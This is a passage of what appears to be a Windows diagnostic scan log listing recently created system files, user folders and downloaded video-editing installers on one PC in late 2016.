2016-10-04 01:16 - 2016-10-04 01:16 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\findnetprinters.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\AddressParser.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00054624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\provtool.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\BackgroundMediaPolicy.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactActivation.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.Search.UriHandler.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemovableMediaProvisioningPlugin.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00046784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapstoasttask.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00036704 _____ (Microsoft Corporation) C:\WINDOWS\system32\SysResetErr.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00036168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfpmp.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\spaceman.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\netiougc.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00023776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00021344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cmimcext.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\nativemap.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerSvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\delegatorprovider.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi_passthru.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Provisioning.ProxyStub.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_IS2022.DLL
2016-10-04 01:16 - 2016-10-04 01:16 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvcProxy.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\c_GSM7.DLL
2016-10-04 01:16 - 2016-10-04 01:16 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosTrace.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MosHost.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccessRes.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneutilRes.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneServiceRes.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6r.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlStringsRes.dll
2016-10-04 01:15 - 2016-10-04 01:16 - 00734208 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 13867520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 05683712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 03196416 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 02423296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAJApi.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 02166232 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 01993216 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Ocr.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Import.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00601200 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00589144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ClipSp.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00583648 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00576512 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00570720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00520192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2016-10-04 01:15 - 2016-10-04 01:15 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00496872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\system32\webio.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00458592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00445952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprapi.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00441856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFiDirect.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00366080 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmrdvcore.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00340320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00293888 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvcext.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.Phone.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00265728 _____ C:\WINDOWS\system32\Windows.Perception.Stub.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00262960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00262656 _____ (Microsoft Corporation) C:\WINDOWS\system32\pdh.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00261984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00257536 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataExchange.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00254976 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00240640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkssvc.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvc.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00226304 _____ (Microsoft Corporation) C:\WINDOWS\system32\container.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-10-04 01:15 - 2016-10-04 01:15 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbvideo.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00175968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00145248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Radios.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinRtTracing.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Energy.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00132608 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00113504 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmapi.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00111968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00101216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\EhStorTcgDrv.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00095072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthRadioMedia.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzautoupdate.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.UserDeviceAssociation.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\NfcRadioMedia.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\ffbroker.dll
2016-10-04 01:15 - 2016-10-04 01:15 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidusb.sys
2016-10-04 01:15 - 2016-10-04 01:15 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2016-10-04 01:07 - 2016-07-16 05:45 - 03331584 _____ (Microsoft Corporation) C:\WINDOWS\system32\NlsLexicons0018.dll
2016-10-04 01:07 - 2016-07-16 05:42 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\NlsData0018.dll
2016-10-04 01:07 - 2016-07-16 05:39 - 01868800 _____ (Microsoft Corporation) C:\WINDOWS\system32\MLS2.dll
2016-10-04 01:05 - 2016-10-04 01:05 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2016-10-04 01:02 - 2016-10-04 01:02 - 00000000 ____D C:\WINDOWS\system32\msmq
2016-10-04 01:02 - 2016-10-04 01:02 - 00000000 ____D C:\WINDOWS\system32\BestPractices
2016-10-04 01:02 - 2016-10-04 01:02 - 00000000 ____D C:\Program Files\Reference Assemblies
2016-10-04 01:02 - 2016-10-04 01:02 - 00000000 ____D C:\Program Files\MSBuild
2016-10-04 01:02 - 2016-10-04 01:02 - 00000000 ____D C:\inetpub
2016-10-04 01:00 - 2016-05-25 22:03 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2016-10-04 01:00 - 2016-05-25 22:03 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2016-10-04 01:00 - 2016-05-25 22:03 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2016-10-04 00:59 - 2016-10-04 00:59 - 00173408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wof.sys
2016-10-03 16:05 - 2016-10-03 16:05 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2016-10-03 15:29 - 2016-10-03 15:29 - 00000000 ____D C:\ProgramData\USOShared
2016-10-03 15:28 - 2016-10-03 16:07 - 00000000 ____D C:\Users\admin\AppData\Local\ConnectedDevicesPlatform
2016-10-03 15:27 - 2016-10-03 15:27 - 00000020 ___SH C:\Users\admin\ntuser.ini
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default\My Documents
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default\Documents\My Videos
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default\Documents\My Pictures
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default\Documents\My Music
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default User\Documents\My Videos
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default User\Documents\My Pictures
2016-10-03 15:25 - 2016-10-03 15:25 - 00000000 _SHDL C:\Users\Default User\Documents\My Music
2016-10-03 15:17 - 2016-10-03 15:24 - 00015243 _____ C:\WINDOWS\diagwrn.xml
2016-10-03 15:17 - 2016-10-03 15:24 - 00015243 _____ C:\WINDOWS\diagerr.xml
2016-10-03 15:09 - 2016-10-13 11:42 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-10-03 14:50 - 2016-10-03 14:50 - 00001487 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-10-03 14:50 - 2016-10-03 14:50 - 00000000 ____D C:\Users\Default\AppData\Roaming\Media Center Programs
2016-10-03 14:50 - 2016-10-03 14:50 - 00000000 ____D C:\Users\Default\AppData\Local\Google
2016-10-03 14:50 - 2016-10-03 14:50 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Media Center Programs
2016-10-03 14:50 - 2016-10-03 14:50 - 00000000 ____D C:\Users\Default User\AppData\Local\Google
2016-10-03 14:46 - 2016-10-03 14:51 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2016-10-03 14:46 - 2016-10-03 14:46 - 00000000 ____D C:\Program Files\Common Files\SpeechEngines
2016-10-03 14:41 - 2016-10-06 16:07 - 00000000 ____D C:\Users\admin
2016-10-03 14:41 - 2016-10-03 14:58 - 00000000 ____D C:\Users\DefaultAppPool
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\user\My Documents
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\user\Documents\My Videos
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\user\Documents\My Pictures
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\user\Documents\My Music
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\DefaultAppPool\My Documents
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Videos
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Pictures
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Music
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\admin\My Documents
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\admin\Documents\My Videos
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\admin\Documents\My Pictures
2016-10-03 14:41 - 2016-10-03 14:41 - 00000000 _SHDL C:\Users\admin\Documents\My Music
2016-10-03 14:40 - 2016-10-13 11:47 - 01181114 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-10-03 14:35 - 2016-10-03 14:46 - 00000000 ____D C:\Program Files\Realtek
2016-10-03 14:35 - 2016-10-03 14:35 - 00000000 ____D C:\WINDOWS\system32\sda
2016-10-03 14:35 - 2016-10-03 14:35 - 00000000 ____D C:\WINDOWS\system32\RTCOM
2016-10-03 14:31 - 2016-10-13 10:51 - 00286768 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-10-03 14:31 - 2016-10-12 13:59 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-10-03 14:31 - 2016-10-03 14:31 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2016-10-03 11:55 - 2016-10-03 11:56 - 05111808 _____ (Thomas Tsai) C:\Users\admin\Downloads\tuxboot-0.8.2.exe
2016-09-30 15:42 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avidemux (32 bits)
2016-09-30 15:42 - 2016-09-30 15:52 - 00000000 ____D C:\Users\admin\AppData\Roaming\avidemux
2016-09-30 15:42 - 2016-09-30 15:42 - 00001142 _____ C:\Users\Public\Desktop\Avidemux 2.6 - 32 bits (32-bit).lnk
2016-09-30 15:40 - 2016-09-30 15:42 - 00000000 ____D C:\Program Files\Avidemux 2.6 - 32 bits
2016-09-30 15:39 - 2016-09-30 15:40 - 24982849 _____ C:\Users\admin\Downloads\avidemux_2.6.14_win32.exe
2016-09-30 15:37 - 2016-09-30 15:37 - 00000000 ____D C:\Users\admin\AppData\Roaming\iDealshare VideoGo 6
2016-09-30 15:36 - 2016-09-30 15:36 - 18103025 _____ (iDealshare Corporation ) C:\Users\admin\Downloads\i-video-converter.exe
2016-09-30 15:08 - 2016-09-30 15:08 - 00000000 ____D C:\Users\admin\AppData\Local\bunkus.org
2016-09-30 15:06 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MKVToolNix
2016-09-30 15:06 - 2016-09-30 15:06 - 00001966 _____ C:\Users\Public\Desktop\MKVToolNix GUI.lnk
2016-09-30 15:06 - 2016-09-30 15:06 - 00000000 ____D C:\Program Files\MKVToolNix
2016-09-30 15:05 - 2016-09-30 15:06 - 14148696 _____ (Moritz Bunkus) C:\Users\admin\Downloads\mkvtoolnix-32bit-9.4.2-setup.exe
2016-09-30 14:43 - 2016-09-30 14:44 - 10550447 _____ (Aone Software ) C:\Users\admin\Downloads\uvjoiner.exe
2016-09-30 13:51 - 2016-09-30 13:51 - 00000000 ____D C:\Users\admin\Downloads\msvcr100
2016-09-30 13:32 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MP4Tools
2016-09-30 13:32 - 2016-09-30 13:32 - 00001149 _____ C:\Users\admin\Desktop\MP4Splitter.lnk
2016-09-30 13:32 - 2016-09-30 13:32 - 00001139 _____ C:\Users\admin\Desktop\MP4Joiner.lnk
2016-09-30 13:32 - 2016-09-30 13:32 - 00000000 ____D C:\Program Files\MP4Tools
2016-09-30 12:52 - 2016-09-30 12:53 - 18565891 _____ (Thüring IT-Consulting ) C:\Users\admin\Downloads\MP4Tools-3.4-win32.exe
2016-09-30 12:48 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Video Joiner
2016-09-30 12:48 - 2016-09-30 12:48 - 00001068 _____ C:\Users\Public\Desktop\Free Video Joiner.lnk
2016-09-30 12:48 - 2016-09-30 12:48 - 00000000 ____D C:\Program Files\Free Video Joiner
2016-09-30 12:47 - 2016-09-30 12:48 - 06324201 _____ (FreeVideoJoiner.com ) C:\Users\admin\Downloads\freevideojoinersetup.exe
2016-09-30 10:36 - 2016-09-30 15:56 - 00000000 ____D C:\Users\admin\Desktop\Peter Russell - The Global Brain (1983)
2016-09-30 10:01 - 2016-09-30 10:12 - 08935424 _____ C:\Users\admin\Desktop\EURUSD-M1.xls
2016-09-30 09:38 - 2016-09-30 09:47 - 02309498 _____ C:\Users\admin\Desktop\EURUSD,M1.csv
2016-09-30 09:18 - 2016-09-30 09:18 - 00032841 _____ C:\Users\admin\Downloads\Output History.ex4
2016-09-29 12:08 - 2016-09-29 12:08 - 26323424 _____ (Irfan Skiljan) C:\Users\admin\Downloads\irfanview_plugins_x64_442_setup.exe
